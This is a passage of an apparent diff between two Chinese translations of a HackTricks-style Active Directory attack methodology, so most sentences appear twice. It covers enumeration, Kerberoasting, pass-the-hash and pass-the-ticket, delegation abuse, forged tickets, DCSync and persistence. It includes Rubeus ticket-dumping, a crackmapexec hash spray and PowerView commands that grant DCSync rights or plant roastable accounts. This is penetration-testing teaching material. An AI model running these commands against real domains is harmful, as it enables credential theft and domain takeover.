{% endcontent-ref %}
## 使用凭/会话枚举活动目录
## 使用凭/会话枚举活动目录
在此阶段,您需要**破解有效域帐户的凭证或会话**。如果您有一些有效凭证或作为域用户的 shell**请记住之前提供的选项仍然是妥协其他用户的选项**。
在此阶段,您需要**破坏有效域帐户的凭据或会话**。如果您有一些有效的凭据或作为域用户的shell**您应该记住之前给出的选项仍然是破坏其他用户的选项**。
在开始经过身份验证的枚举之前,您应该了解**Kerberos 双跳问题**。
在开始经过身份验证的枚举之前,您应该了解**Kerberos双跳问题**。
{% content-ref url="kerberos-double-hop-problem.md" %}
[kerberos-double-hop-problem.md](kerberos-double-hop-problem.md)
@ -168,52 +165,51 @@ Get-GlobalAddressList -ExchHostname [ip] -UserName [domain]\[username] -Password
### 枚举
获得一个帐户的控制权是**开始妥协整个域的重要一步**,因为您将能够开始**活动目录枚举:**
成功破坏一个帐户是**开始破坏整个域的重大步骤**,因为您将能够开始**活动目录枚举:**
关于[**ASREPRoast**](asreproast.md),您现在可以找到每个可能易受攻击用户,关于[**密码喷洒**](password-spraying.md),您可以获取**所有用户名的列表**,并尝试使用被妥协帐户的密码、空密码和新的有希望的密码。
关于[**ASREPRoast**](asreproast.md),您现在可以找到每个可能易受攻击用户,关于[**密码喷洒**](password-spraying.md),您可以获取**所有用户名的列表**并尝试被破坏帐户的密码、空密码和新的有前景的密码。
* 您可以使用[**CMD 执行基本侦察**](../basic-cmd-for-pentesters.md#domain-info)
* 您还可以使用[**用于侦察的 PowerShell**](../basic-powershell-for-pentesters/),这将更隐蔽
* 您还可以使用[**powerview**](../basic-powershell-for-pentesters/powerview.md)提取更详细的信息
* 在活动目录中进行侦察的另一个神奇工具是[**BloodHound**](bloodhound.md)。它**不太隐蔽**(取决于您使用的收集方法),但**如果您不在乎**,绝对值得一试。找到用户可以 RDP 的位置,找到其他组的路径等。
* **其他自动化的 AD 枚举工具有:**[**AD Explorer**](bloodhound.md#ad-explorer)**、**[**ADRecon**](bloodhound.md#adrecon)**、**[**Group3r**](bloodhound.md#group3r)**、**[**PingCastle**](bloodhound.md#pingcastle)**。**
* [**AD DNS 记录**](ad-dns-records.md)可能包含有趣的信息。
* 一个您可以使用的具有 GUI 的**工具**来枚举目录是来自**SysInternal** Suite 的**AdExplorer.exe**。
* 您还可以使用**ldapsearch**在 LDAP 数据库中搜索以查找字段\_userPassword\_和\_unixUserPassword\_中的凭证甚至是\_Description\_。参见[PayloadsAllTheThings 上的 AD 用户评论中的密码](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#password-in-ad-user-comment)以获取其他方法。
* 您可以使用[**CMD进行基本侦查**](../basic-cmd-for-pentesters.md#domain-info)
* 您还可以使用[**powershell进行侦查**](../basic-powershell-for-pentesters/),这将更隐蔽
* 您还可以[**使用powerview**](../basic-powershell-for-pentesters/powerview.md)提取更详细的信息
* 另一个在活动目录中进行侦查的惊人工具是[**BloodHound**](bloodhound.md)。它**不是很隐蔽**(取决于您使用的收集方法),但**如果您不在乎**这一点您绝对应该尝试一下。查找用户可以RDP的地方查找其他组的路径等。
* **其他自动化AD枚举工具包括** [**AD Explorer**](bloodhound.md#ad-explorer)**,** [**ADRecon**](bloodhound.md#adrecon)**,** [**Group3r**](bloodhound.md#group3r)**,** [**PingCastle**](bloodhound.md#pingcastle)**.**
* [**AD的DNS记录**](ad-dns-records.md),因为它们可能包含有趣的信息。
* 您可以使用**SysInternal** Suite中的**AdExplorer.exe**进行目录枚举的**GUI工具**。
* 您还可以使用**ldapsearch**在LDAP数据库中搜索以查找字段_userPassword_和_unixUserPassword_中的凭据甚至查找_Description_。请参阅[PayloadsAllTheThings上的AD用户注释中的密码](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#password-in-ad-user-comment)以获取其他方法。
* 如果您使用**Linux**,您还可以使用[**pywerview**](https://github.com/the-useless-one/pywerview)枚举域。
* 您还可以尝试自动化工具,如:
* [**tomcarver16/ADSearch**](https://github.com/tomcarver16/ADSearch)
* [**61106960/adPEAS**](https://github.com/61106960/adPEAS)
* **提取所有域用户**
* **提取所有域用户**
Windows`net user /domain``Get-DomainUser`或`wmic useraccount get name,sid`很容易获取所有域用户名。在 Linux 中,您可以使用:`GetADUsers.py -all -dc-ip 10.10.10.110 domain.com/username`或`enum4linux -a -u "user" -p "password" <DC IP>`
从Windows中获取所有域用户名非常简单`net user /domain``Get-DomainUser`或`wmic useraccount get name,sid`。在Linux中您可以使用`GetADUsers.py -all -dc-ip 10.10.10.110 domain.com/username`或`enum4linux -a -u "user" -p "password" <DC IP>`
> 即使此枚举部分看起来很小,这是最重要的部分。访问链接(主要是 cmd、powershell、powerview 和 BloodHound 的链接),学习如何枚举域并练习直到您感到自在。在评估期间,这将是找到通往 DA 的关键时刻,或者决定无法做任何事情的关键时刻
> 即使这个枚举部分看起来很小这也是最重要的部分。访问链接主要是cmd、powershell、powerview和BloodHound的链接学习如何枚举域并练习直到您感到舒适。在评估期间这将是找到通往DA的关键时刻或者决定没有任何事情可以做
### Kerberoast
Kerberoasting 包括获取与用户帐户绑定的服务使用的**TGS 票证**并**离线**破解其基于用户密码的加密
Kerberoasting涉及获取**TGS票证**,这些票证由与用户帐户相关的服务使用,并破解其加密——这基于用户密码——**离线**
有关更多信息,请参阅
更多信息请参见
{% content-ref url="kerberoast.md" %}
[kerberoast.md](kerberoast.md)
{% endcontent-ref %}
### 远程连接RDP、SSH、FTP、Win-RM 等)
### 远程连接RDP、SSH、FTP、Win-RM等
一旦您获得了一些凭证,您可以检查是否可以访问任何**计算机**。为此,您可以使用**CrackMapExec**尝试使用不同协议连接到多台服务器,根据您的端口扫描
一旦您获得了一些凭据,您可以检查是否可以访问任何**机器**。为此,您可以使用**CrackMapExec**尝试通过不同协议连接到多个服务器,具体取决于您的端口扫描结果
### 本地权限提升
如果您作为常规域用户获得了凭证或会话并且可以使用此用户访问域中的任何计算机您应该尝试找到提升本地权限和窃取凭证的方法。这是因为只有具有本地管理员权限您才能在内存LSASS和本地SAM中**转储其他用户的哈希**。
如果您已经破坏了凭据或作为常规域用户的会话,并且您可以使用此用户**访问域中的任何机器**,您应该尝试找到**本地提升权限和寻找凭据的方法**。这是因为只有在本地管理员权限下,您才能**在内存中LSASS和本地SAM转储其他用户的哈希**。
本书中有一整页关于[**Windows 中的本地权限提升**](../windows-local-privilege-escalation/)和一个[**清单**](../checklist-windows-privilege-escalation.md)。此外,不要忘记使用[**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)。
本书中有一整页关于[**Windows中的本地权限提升**](../windows-local-privilege-escalation/)和一个[**检查表**](../checklist-windows-privilege-escalation.md)。此外,不要忘记使用[**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)。
### 当前会话票证
当前用户的**票证**中很**不可能**会发现**允许访问**意外资源的权限,但您可以检查:
您很**不可能**在当前用户中找到**票证**,使您能够访问意外资源,但您可以检查:
```bash
## List all tickets (if not admin, only current user tickets)
.\Rubeus.exe triage
@ -221,20 +217,19 @@ Kerberoasting 包括获取与用户帐户绑定的服务使用的**TGS 票证**
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
```
### NTML Relay
如果你已经枚举了活动目录,你将拥有更多的电子邮件和对网络的更好理解。你可能能够强制进行 NTML 中继攻击。
如果你已经成功枚举了活动目录,你将会有**更多的电子邮件和对网络的更好理解**。你可能能够强制进行 NTML [**中继攻击**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack)**。**
### 在计算机共享中查找凭证
### **在计算机共享中查找凭据**
现在你已经有了一些基本凭证,你应该检查是否可以在活动目录中找到任何共享的有趣文件。你可以手动执行此操作,但这是一项非常乏味重复的任务(尤其是如果你发现需要检查数百个文档)。
现在你有了一些基本凭据,你应该检查是否可以**找到**任何**在 AD 中共享的有趣文件**。你可以手动进行,但这是一项非常无聊的重复任务(如果你发现数百个需要检查的文档,更是如此)。
[**点击此链接了解可使用的工具。**](../../network-services-pentesting/pentesting-smb/#domain-shared-folders-search)
[**点击此链接了解使用的工具。**](../../network-services-pentesting/pentesting-smb/#domain-shared-folders-search)
### 窃取 NTLM 凭证
### 偷取 NTLM 凭据
如果你可以访问其他计算机或共享,你可以放置文件(如一个 SCF 文件),如果某种方式被访问,将会触发一个针对你的 NTML 认证,这样你就可以窃取 NTLM 挑战以破解它:
如果你可以**访问其他 PC 或共享**,你可以**放置文件**(如 SCF 文件),如果以某种方式被访问,将**触发对你的 NTML 认证**,这样你就可以**窃取** **NTLM 挑战**以破解它:
{% content-ref url="../ntlm/places-to-steal-ntlm-creds.md" %}
[places-to-steal-ntlm-creds.md](../ntlm/places-to-steal-ntlm-creds.md)
@ -242,90 +237,88 @@ Kerberoasting 包括获取与用户帐户绑定的服务使用的**TGS 票证**
### CVE-2021-1675/CVE-2021-34527 PrintNightmare
此漏洞允许任何经过身份验证的用户妥协域控制器
此漏洞允许任何经过身份验证的用户**破坏域控制器**
{% content-ref url="printnightmare.md" %}
[printnightmare.md](printnightmare.md)
{% endcontent-ref %}
## 在具有特权凭证/会话的活动目录上提升权限
## 在具有特权凭据/会话的活动目录上进行特权提升
**对于以下技术,普通域用户是不够的,你需要一些特殊的特权/凭来执行这些攻击。**
**对于以下技术,普通域用户是不够的,你需要一些特殊的特权/凭来执行这些攻击。**
### 提取哈希
### 哈希提取
希望你已经成功妥协了一些本地管理员帐户,使用 AsRepRoast、Password Spraying、Kerberoast、Responder 包括中继、EvilSSDP、本地权限提升等方法。\
然后,是时候在内存和本地转储所有哈希了。\
[**阅读此页面了解获取哈希的不同方法。**](https://github.com/carlospolop/hacktricks/blob/cn/windows-hardening/active-directory-methodology/broken-reference/README.md)
希望你已经成功**破坏了一些本地管理员**账户,使用 [AsRepRoast](asreproast.md)、[Password Spraying](password-spraying.md)、[Kerberoast](kerberoast.md)、[Responder](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) 包括中继、[EvilSSDP](../../generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md)、[本地提升特权](../windows-local-privilege-escalation/)。\
然后,是时候转储内存和本地的所有哈希。\
[**阅读此页面了解获取哈希的不同方法。**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/active-directory-methodology/broken-reference/README.md)
### 传递哈希
**一旦你有用户的哈希,你可以使用它来冒充该用户。**\
你需要使用一些工具,它将使用该哈希执行 NTLM 认证,或者你可以创建一个新的 sessionlogon 并将该哈希注入 LSASS因此当执行任何 NTLM 认证时,将使用该哈希。最后一种选择是 mimikatz 所做的。\
[**阅读此页面获取更多信息。**](../ntlm/#pass-the-hash)
**一旦你有用户的哈希**,你可以用它来**冒充**该用户。\
你需要使用某些**工具**来**执行**使用该**哈希**的**NTLM 认证****或者**你可以创建一个新的**sessionlogon**并**注入**该**哈希**到**LSASS**中,这样当任何**NTLM 认证被执行**时,该**哈希将被使用。**最后一个选项就是 mimikatz 所做的。\
[**阅读此页面获取更多信息。**](../ntlm/#pass-the-hash)
### 超越传递哈希/传递密钥
### 超越哈希/传递密钥
这种攻击旨在使用用户的 NTLM 哈希请求 Kerberos 门票,作为常见的通过 NTLM 协议传递哈希的替代方法。因此,在禁用 NTLM 协议且仅允许 Kerberos 作为认证协议的网络中,这可能特别有用
此攻击旨在**使用用户的 NTLM 哈希请求 Kerberos 票证**,作为常见的 NTLM 协议下的传递哈希的替代方案。因此,这在**禁用 NTLM 协议**且仅允许**Kerberos**作为认证协议的网络中尤其**有用**
{% content-ref url="over-pass-the-hash-pass-the-key.md" %}
[over-pass-the-hash-pass-the-key.md](over-pass-the-hash-pass-the-key.md)
{% endcontent-ref %}
### 传递
### 传递票
“传递门票PTT”攻击方法中攻击者窃取用户的认证票据而不是其密码或哈希值。然后使用这个被窃取的票据冒充用户获取对网络中资源和服务的未授权访问。
**传递票证 (PTT)** 攻击方法中,攻击者**窃取用户的认证票证**而不是他们的密码或哈希值。然后使用这个被窃取的票证来**冒充用户**,获得对网络中资源和服务的未授权访问。
{% content-ref url="pass-the-ticket.md" %}
[pass-the-ticket.md](pass-the-ticket.md)
{% endcontent-ref %}
### 凭证重用
如果你有本地管理员的哈希或密码,你应该尝试使用它在其他计算机上进行本地登录。
### 凭据重用
如果你拥有**本地管理员**的**哈希**或**密码**,你应该尝试使用它**本地登录**到其他**PC**。
```bash
# Local Auth Spray (once you found some local admin pass or hash)
## --local-auth flag indicate to only try 1 time per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
```
{% hint style="warning" %}
请注意,这可能会**嘈杂**,而**LAPS**可以**减轻**这种情况。
注意,这非常**嘈杂**,而且**LAPS**会**减轻**这种情况。
{% endhint %}
### MSSQL 滥用 & 受信任的链接
### MSSQL 滥用与受信任链接
如果用户具有**访问 MSSQL 实例的权限**,他可能能够使用它在 MSSQL 主机中(如果作为 SA 运行)**执行命令****窃取** NetNTLM **哈希**,甚至执行**中继** **攻击**。\
此外,如果一个 MSSQL 实例被另一个 MSSQL 实例信任(数据库链接)。如果用户对受信任的数据库具有权限,他将能够**使用信任关系在另一个实例中执行查询**。这些信任可以链接在一起,用户最终可能能够找到一个配置错误的数据库,从而可以执行命令。\
如果用户有权限**访问 MSSQL 实例**,他可能能够利用它在 MSSQL 主机上**执行命令**(如果以 SA 身份运行)**窃取** NetNTLM **哈希**,甚至执行**中继****攻击**。\
此外,如果一个 MSSQL 实例被另一个 MSSQL 实例信任(数据库链接)。如果用户对受信任的数据库有权限,他将能够**利用信任关系在另一个实例中执行查询**。这些信任可以链式连接,在某些情况下,用户可能能够找到一个配置错误的数据库,在那里他可以执行命令。\
**数据库之间的链接甚至可以跨森林信任工作。**
{% content-ref url="abusing-ad-mssql.md" %}
[abusing-ad-mssql.md](abusing-ad-mssql.md)
{% endcontent-ref %}
### 无限制委派
### 不受限制的委派
如果发现任何具有属性 [ADS\_UF\_TRUSTED\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx) 的计算机对象,并且您在计算机中具有域权限,您将能够从每个登录到计算机的用户的内存中转储 TGT。\
因此,如果**域管理员登录到计算机**,您将能够转储他的 TGT 并使用 [传递票据](pass-the-ticket.md) 模拟他。\
借助有限制的委派,您甚至可以**自动妥协打印服务器**(希望它是 DC
如果发现任何具有属性 [ADS\_UF\_TRUSTED\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx) 的计算机对象,并且你在该计算机上拥有域权限,你将能够从登录到该计算机的每个用户的内存中转储 TGT。\
因此,如果**域管理员登录到该计算机**,你将能够转储他的 TGT并使用 [Pass the Ticket](pass-the-ticket.md) 冒充他。\
得益于受限委派,你甚至可以**自动妥协打印服务器**(希望它是 DC
{% content-ref url="unconstrained-delegation.md" %}
[unconstrained-delegation.md](unconstrained-delegation.md)
{% endcontent-ref %}
### 有限制的委派
### 受限委派
如果允许用户或计算机进行“有限制的委派”,它将能够**模拟任何用户以访问计算机中的某些服务**。\
然后,如果您**妥协了此用户/计算机的哈希**,您将能够**模拟任何用户**(甚至域管理员)以访问某些服务。
如果用户或计算机被允许进行“受限委派”,它将能够**冒充任何用户以访问计算机中的某些服务**。\
然后,如果你**妥协**该用户/计算机的哈希,你将能够**冒充任何用户**(甚至是域管理员)以访问某些服务。
{% content-ref url="constrained-delegation.md" %}
[constrained-delegation.md](constrained-delegation.md)
{% endcontent-ref %}
### 基于资源的有限制委派
### 基于资源的受限委派
在远程计算机的 Active Directory 对象上具有**写入**权限可以实现以**提升权限**执行代码
在远程计算机的 Active Directory 对象上拥有**写入**权限可以实现**提升权限**的代码执行
{% content-ref url="resource-based-constrained-delegation.md" %}
[resource-based-constrained-delegation.md](resource-based-constrained-delegation.md)
@ -333,24 +326,24 @@ crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9c
### ACL 滥用
受损的用户可能对一些**域对象**具有一些**有趣的特权**,这可能让您**横向移动**/**提升**特权
被妥协的用户可能对某些域对象拥有一些**有趣的权限**,这可能让你**横向移动**/**提升**权限
{% content-ref url="acl-persistence-abuse/" %}
[acl-persistence-abuse](acl-persistence-abuse/)
{% endcontent-ref %}
### 打印服务滥用
### 打印机后台处理程序服务滥用
发现域中有一个**监听 Spool 服务**的服务可能会被**滥用**以**获取新凭证**和**提升权限**。
发现域内**后台处理程序服务**的**监听**可以被**滥用**以**获取新凭据**并**提升权限**。
{% content-ref url="acl-persistence-abuse/" %}
[acl-persistence-abuse](acl-persistence-abuse/)
{% content-ref url="printers-spooler-service-abuse.md" %}
[printers-spooler-service-abuse.md](printers-spooler-service-abuse.md)
{% endcontent-ref %}
### 第三方会话滥用
如果**其他用户访问受损**的计算机,可以**从内存中收集凭证**,甚至**在其进程中注入信标**以冒充他们。\
通常用户将通过 RDP 访问系统,因此您可以在这里执行一些关于第三方 RDP 会话的攻击
如果**其他用户****访问**被**妥协**的机器,可能会**从内存中收集凭据**,甚至**在他们的进程中注入信标**以冒充他们。\
通常用户会通过 RDP 访问系统,因此这里有如何对第三方 RDP 会话执行几种攻击的方法
{% content-ref url="rdp-sessions-abuse.md" %}
[rdp-sessions-abuse.md](rdp-sessions-abuse.md)
@ -358,15 +351,15 @@ crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9c
### LAPS
**LAPS** 提供了一个管理域加入计算机上的**本地管理员密码**的系统,确保其是**随机的**、唯一的,并经常**更改**。这些密码存储在 Active Directory 中,并且通过 ACLs 仅控制授权用户的访问。有足够权限访问这些密码,就可以进行到其他计算机的转移
**LAPS** 提供了一种管理域加入计算机上的**本地管理员密码**的系统,确保其**随机化**、唯一且频繁**更改**。这些密码存储在 Active Directory 中,访问通过 ACL 控制,仅限授权用户。拥有足够权限访问这些密码后,转向其他计算机变得可能
{% content-ref url="laps.md" %}
[laps.md](laps.md)
{% endcontent-ref %}
### 证书窃
### 证书
从受损计算机中**收集证书**可能是升级环境中的权限的一种方式:
**从被妥协的机器收集证书**可能是提升环境内权限的一种方式:
{% content-ref url="ad-certificates/certificate-theft.md" %}
[certificate-theft.md](ad-certificates/certificate-theft.md)
@ -374,74 +367,72 @@ crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9c
### 证书模板滥用
如果**配置了易受攻击的模板**,可以滥用它们以提升权限:
如果**易受攻击的模板**被配置,可以利用它们来提升权限:
{% content-ref url="ad-certificates/domain-escalation.md" %}
[domain-escalation.md](ad-certificates/domain-escalation.md)
{% endcontent-ref %}
## 具有高权限帐户的后期利用
## 高权限账户的后期利用
### 转储域凭据
一旦获得**域管理员**甚至更好的**企业管理员**权限,您可以**转储**域数据库_ntds.dit_。
一旦你获得**域管理员**或更好的**企业管理员**权限,你可以**转储**域数据库_ntds.dit_。
[**有关 DCSync 攻击的更多信息,请参阅此处**](dcsync.md)。
[**有关 DCSync 攻击的更多信息可以在这里找到**](dcsync.md)。
[**有关如何窃取 NTDS.dit 的更多信息,请参阅此处**](https://github.com/carlospolop/hacktricks/blob/cn/windows-hardening/active-directory-methodology/broken-reference/README.md)
[**有关如何窃取 NTDS.dit 的更多信息可以在这里找到**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/active-directory-methodology/broken-reference/README.md)
### 权升作为持久性
### 权限提升作为持久性
之前讨论的一些技术可以用于持久性。\
例如,可以:
之前讨论的一些技术可以用于持久性。\
例如,可以:
* 使用户易受[**Kerberoast**](kerberoast.md)攻击
* 使用户易受[**Kerberoast**](kerberoast.md)攻击
```powershell
Set-DomainObject -Identity <username> -Set @{serviceprincipalname="fake/NOTHING"}r
```
* 使用户容易受到 [**ASREPRoast**](asreproast.md) 的攻击
* 使用户易受[**ASREPRoast**](asreproast.md)攻击
```powershell
Set-DomainObject -Identity <username> -XOR @{UserAccountControl=4194304}
```
* 授予用户 [**DCSync**](./#dcsync) 权限
* 授予用户[**DCSync**](./#dcsync)权限
```powershell
Add-DomainObjectAcl -TargetIdentity "DC=SUB,DC=DOMAIN,DC=LOCAL" -PrincipalIdentity bfarmer -Rights DCSync
```
### 银票
### 银票
**银票据攻击**通过使用例如PC 帐户的**哈希**)创建特定服务的**合法票据授予服务 (TGS) 票据**。此方法用于**访问服务权限**。
**银票攻击**为特定服务创建一个**合法的票据授予服务TGS票据**,通过使用**NTLM 哈希**(例如,**PC 账户的哈希**。此方法用于**访问服务权限**。
{% content-ref url="silver-ticket.md" %}
[silver-ticket.md](silver-ticket.md)
{% endcontent-ref %}
### 金票
### 金票
**金票据攻击**涉及攻击者获取 Active DirectoryAD环境中 **krbtgt 帐户的 NTLM 哈希**。此帐户特殊之处在于它用于签署所有**票据授予票据 (TGTs)**,这对于在 AD 网络内进行身份验证至关重要。
**金票攻击**涉及攻击者在 Active Directory (AD) 环境中获取**krbtgt 账户的 NTLM 哈希**。该账户是特殊的,因为它用于签署所有**票据授予票据TGTs**,这些票据对于在 AD 网络中进行身份验证至关重要。
一旦攻击者获得此哈希,他们可以为他们选择的任何帐户创建**TGTs**(银票据攻击)。
一旦攻击者获得此哈希,他们可以为他们选择的任何账户创建**TGTs**(银票攻击)。
{% content-ref url="golden-ticket.md" %}
[golden-ticket.md](golden-ticket.md)
{% endcontent-ref %}
### 钻石票
### 钻石票
这些类似于以一种方式伪造的金票**绕过常见金票检测机制**。
这些票据类似于金票,但以**绕过常见金票检测机制**的方式伪造
{% content-ref url="diamond-ticket.md" %}
[diamond-ticket.md](diamond-ticket.md)
{% endcontent-ref %}
### **证书户持久性**
### **证书户持久性**
**拥有帐户的证书或能够请求它们**是一种非常好的方式,可以在用户帐户中**持久存在**(即使他更改密码):
**拥有账户的证书或能够请求它们**是能够在用户账户中持久存在的非常好方法(即使他更改密码):
{% content-ref url="ad-certificates/account-persistence.md" %}
[account-persistence.md](ad-certificates/account-persistence.md)
@ -449,7 +440,7 @@ Add-DomainObjectAcl -TargetIdentity "DC=SUB,DC=DOMAIN,DC=LOCAL" -PrincipalIdenti
### **证书域持久性**
**使用证书也可以在域内以高权限持久存在**
**使用证书也可以在域内以高权限持久存在**
{% content-ref url="ad-certificates/domain-persistence.md" %}
[domain-persistence.md](ad-certificates/domain-persistence.md)
@ -457,13 +448,13 @@ Add-DomainObjectAcl -TargetIdentity "DC=SUB,DC=DOMAIN,DC=LOCAL" -PrincipalIdenti
### AdminSDHolder 组
Active Directory 中的 **AdminSDHolder** 对象通过在这些组上应用标准的 **访问控制列表 (ACL)** 来确保**特权组**(如域管理员和企业管理员)的安全,以防止未经授权的更改。但是,这个功能可以被利用;如果攻击者修改 AdminSDHolder 的 ACL 以授予常规用户完全访问权限,那么该用户将对所有特权组拥有广泛的控制权。这个旨在保护的安全措施可能会逆火,除非受到密切监视,否则会导致未经授权的访问
Active Directory 中的**AdminSDHolder**对象通过在这些组中应用标准的**访问控制列表ACL**来确保**特权组**(如域管理员和企业管理员)的安全,以防止未经授权的更改。然而,这一功能可以被利用;如果攻击者修改 AdminSDHolder 的 ACL 以授予普通用户完全访问权限,该用户将获得对所有特权组的广泛控制。这个本应保护的安全措施因此可能适得其反,允许不当访问,除非进行严格监控
[**有关 AdminDSHolder 组的更多信息,请点击此处。**](privileged-groups-and-token-privileges.md#adminsdholder-group)
[**有关 AdminDSHolder 组的更多信息在这里。**](privileged-groups-and-token-privileges.md#adminsdholder-group)
### DSRM 凭据
在每个**域控制器 (DC)** 中都存在一个**本地管理员**帐户。通过在这样的计算机上获得管理员权限,可以使用 **mimikatz** 提取本地管理员哈希。随后,需要进行注册表修改以**启用使用此密码**,从而实现远程访问本地管理员帐户。
在每个**域控制器DC**内部,存在一个**本地管理员**账户。通过在这样的机器上获得管理员权限,可以使用**mimikatz**提取本地管理员哈希。随后,需要进行注册表修改以**启用使用此密码**,从而允许远程访问本地管理员账户。
{% content-ref url="dsrm-credentials.md" %}
[dsrm-credentials.md](dsrm-credentials.md)
@ -471,7 +462,7 @@ Active Directory 中的 **AdminSDHolder** 对象通过在这些组上应用标
### ACL 持久性
您可以对某些特定域对象的**用户**授予**特殊权限**,这将使用户能够在将来**提升权限**。
你可以**给予**某个**用户**对某些特定域对象的**特殊权限**,这将使该用户**在未来提升权限**。
{% content-ref url="acl-persistence-abuse/" %}
[acl-persistence-abuse](acl-persistence-abuse/)
@ -479,15 +470,15 @@ Active Directory 中的 **AdminSDHolder** 对象通过在这些组上应用标
### 安全描述符
**安全描述符** 用于**存储**对象对**对象**的**权限**。如果您可以**对对象的安全描述符进行小小更改**,则可以在不需要成为特权组成员的情况下获得对该对象的非常有趣的权限。
**安全描述符**用于**存储**对象对另一个对象的**权限**。如果你能在对象的**安全描述符**中**做一点小改动**,你可以在不需要成为特权组成员的情况下获得对该对象的非常有趣的权限。
{% content-ref url="security-descriptors.md" %}
[security-descriptors.md](security-descriptors.md)
{% endcontent-ref %}
### 骨架
### 骨架钥
在内存中更改 **LSASS** 以建立**通用密码**,从而授予对所有域帐户的访问权限。
在内存中更改**LSASS**以建立一个**通用密码**,授予对所有域账户的访问权限。
{% content-ref url="skeleton-key.md" %}
[skeleton-key.md](skeleton-key.md)
@ -495,8 +486,8 @@ Active Directory 中的 **AdminSDHolder** 对象通过在这些组上应用标
### 自定义 SSP
[了解什么是 SSP安全支持提供程序请点击此处。](../authentication-credentials-uac-and-efs/#security-support-provider-interface-sspi)\
您可以创建**自己的 SSP** 以**以明文**捕获用于访问计算机的**凭据**。
[在这里了解什么是 SSP安全支持提供者。](../authentication-credentials-uac-and-efs/#security-support-provider-interface-sspi)\
你可以创建自己的**SSP**以**捕获**用于访问机器的**凭据**的**明文**。\\
{% content-ref url="custom-ssp.md" %}
[custom-ssp.md](custom-ssp.md)
@ -504,8 +495,8 @@ Active Directory 中的 **AdminSDHolder** 对象通过在这些组上应用标
### DCShadow
它在 AD 中注册一个**新的域控制器**,并使用它在指定对象上**推送属性**SIDHistory、SPN...),而不会留下任何关于**修改**的**日志**。您需要 DA 权限并位于**根域**内。\
请注意,如果使用错误的数据,将会出现非常丑陋的日志。
它在 AD 中注册一个**新的域控制器**,并使用它在指定对象上**推送属性**SIDHistory、SPNs...**而不**留下任何关于**修改**的**日志**。你**需要 DA** 权限并在**根域**内。\
注意,如果你使用错误的数据,会出现相当丑陋的日志。
{% content-ref url="dcshadow.md" %}
[dcshadow.md](dcshadow.md)
@ -513,43 +504,67 @@ Active Directory 中的 **AdminSDHolder** 对象通过在这些组上应用标
### LAPS 持久性
之前我们已经讨论了如果您有**足够的权限读取 LAPS 密码**如何升级权限。但是,这些密码也可以用于**保持持久性**。\
之前我们讨论了如果你有**足够的权限读取 LAPS 密码**,如何提升权限。然而,这些密码也可以用于**维持持久性**。\
查:
{% content-ref url="laps.md" %}
[laps.md](laps.md)
{% endcontent-ref %}
## 森林权升 - 域信任
## 森林权限提升 - 域信任
微软将**森林**视为安全边界。这意味着**入侵单个域可能导致整个森林被入侵**。
微软将**森林**视为安全边界。这意味着**妥协一个域可能会导致整个森林被妥协**。
### 基本信息
[**域信任**](http://technet.microsoft.com/en-us/library/cc759554\(v=ws.10\).aspx) 是一种安全机制,使一个**域**的用户能够访问另一个**域**中的资源。它实质上在两个域的认证系统之间创建了一个链接,允许认证验证无缝流动。当域建立信任时,它们在它们的**域控制器 (DCs)** 中交换并保留特定的**密钥**,这对信任的完整性至关重要。
[**域信任**](http://technet.microsoft.com/en-us/library/cc759554\(v=ws.10\).aspx)是一种安全机制,使一个**域**的用户能够访问另一个**域**中的资源。它本质上在两个域的身份验证系统之间创建了一个链接,允许身份验证验证无缝流动。当域设置信任时,它们在其**域控制器DCs**中交换并保留特定的**密钥**,这些密钥对信任的完整性至关重要。
在典型情况下,如果用户打算访问**受信任域**中的服务,他们必须首先从自己域的 DC 请求一个称为**领域间 TGT** 的特殊票据。这个 TGT 使用两个域已经同意的共享**密钥**进行加密。然后用户将此 TGT 提交给**受信任域的 DC** 以获取一个服务票据 (**TGS**)。在受信任域的 DC 成功验证领域间 TGT 后,它会发放一个 TGS授予用户访问服务的权限。
在典型场景中,如果用户打算访问**受信任域**中的服务,他们必须首先从自己域的 DC 请求一个称为**跨领域 TGT**的特殊票据。此 TGT 使用两个域已达成一致的共享**密钥**进行加密。然后,用户将此 TGT 提交给**受信任域的 DC**以获取服务票据(**TGS**)。在受信任域的 DC 成功验证跨领域 TGT 后,它会发出 TGS授予用户访问该服务的权限。
**步骤**
1. **域 1** 中的**客户计算机**通过使用其**NTLM 哈希**从其**域控制器 (DC1)** 请求一个**票据授予票据 (TGT)** 来启动该过程
2. 如果客户成功验证DC1将发放一个新的 TGT。
3. 然后客户从 DC1 请求一个**领域间 TGT**,这是访问**域 2** 中资源所需的。
4. 领域 TGT 使用 DC1 和 DC2 之间共享的**信任密钥**进行加密,这是双向域信任的一部分
5. 客户将领域间 TGT 带到**域 2 的域控制器 (DC2)**。
6. DC2使用其共享的信任密钥验证领域间 TGT并在有效时发放一个用于访问客户想要访问的域 2 中的服务器的**票据授予服务 (TGS)**。
7. 最后,客户将此 TGS 提交给服务器,该服务器使用其帐户哈希进行加密,以获取对域 2 中服务的访问权限。
1. **域 1**中的**客户端计算机**开始该过程,使用其**NTLM 哈希**向其**域控制器DC1**请求**票据授予票据TGT**
2. 如果客户端成功通过身份验证DC1 会发出新的 TGT。
